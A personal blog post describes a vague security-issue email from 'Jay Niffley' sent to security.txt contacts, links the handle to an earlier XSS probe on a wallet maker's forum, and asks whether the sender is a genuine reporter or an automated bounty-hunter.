(new Soapbox())->shout(array_map('strtoupper', $opinions)); //Shaun's blog


Me, elsewhere

GitHub
parseword
Miscellaneous public code

snuze
A PHP API client for Reddit

Twitter
@parseword
I don't tweet much

XMPP chat
xmpp@shaunc.com
(Pidgin, Miranda, Swift, etc.)


Perfect is the enemy of good enough.

Jay Niffley, Man of Mystery

Posted November 04, 2019 by shaun

Yesterday I received a brief message to an email address listed in various security.txt files:

Date: Sun, 3 Nov 2019 21:36:01 +0100
From: Jay Niffley <jayniffley [] gmail.com>
Subject: Security issues

      Hello,

I´ve found some security issues in your website. Where can i report these
issues over? Do you reward for valid security issues?

Thank you!
-Jay

A Google search for the name "Jay Niffley" was unproductive, and it's likely no real person by that name exists. But the "jayniffley" handle has been used at least once before, in what appears to be an attempted XSS probe on a cryptocurrency wallet manufacturer's support forum. The forum post containing the failed XSS attack references jayniffley.xss.ht. This hostname corresponds to a user of a service called XSS Hunter, a sort of canary interface for people conducting automated XSS testing. Visiting the host in a browser serves up a large JavaScript file ([archive]).

Not knowing whether this vague contact was a legitimate inquiry, I replied with the appropriate contact information and the disappointing news that no bounties are available. Then I took to Twitter, soliciting others who might have received the same message. Several folks confirmed getting a copy to their own security.txt contact addresses. One analyst who replied with a bounty offer was provided with some low-severity bugs, though the conversation quickly degraded, "Niffley" expressing displeasure with the proposed resolution timeline.

It's unclear whether this is an earnest actor attempting to report valid problems, or someone who's running a series of automated scans and carpet-bombing security contacts hoping to scare up some reward money. After declining to pay a bounty, I never heard back from him. If you have insight, feel free to reply to the tweet.



Recent articles

📰 Jay Niffley, Man of Mystery

📰 Compiling Doxygen on FreeBSD without LaTeX and Ghostscript

📰 Introducing Snuze, a PHP client for the Reddit API

📰 jisusaiche: Java's installer telemetry

📰 BIND client log error "query_find: query_getdb failed"

📰 Resolving "The lang/perl5.24 port has been deleted: Has expired" portmaster error

📰 Armagaddon2 interim fix for Firefox 56 and other old versions

📰 Strange DNS queries: qname "miep", qtype ANY

📰 Undeliverable as addressed: A massive broken spam campaign?

📰 Using WITH_META_MODE and ccache for FreeBSD build boosts

📰 Resolving subversion error E000013: Unable to create pristine install stream

📰 Enhancements to SmokePing's AnotherDNS probe

📰 Generating vanity DNSSEC key tags

📰 DDoS involving forged packets from 23.225.141.70

📰 Website integrity monitoring through version control

▲ Back to top | Permalink to this page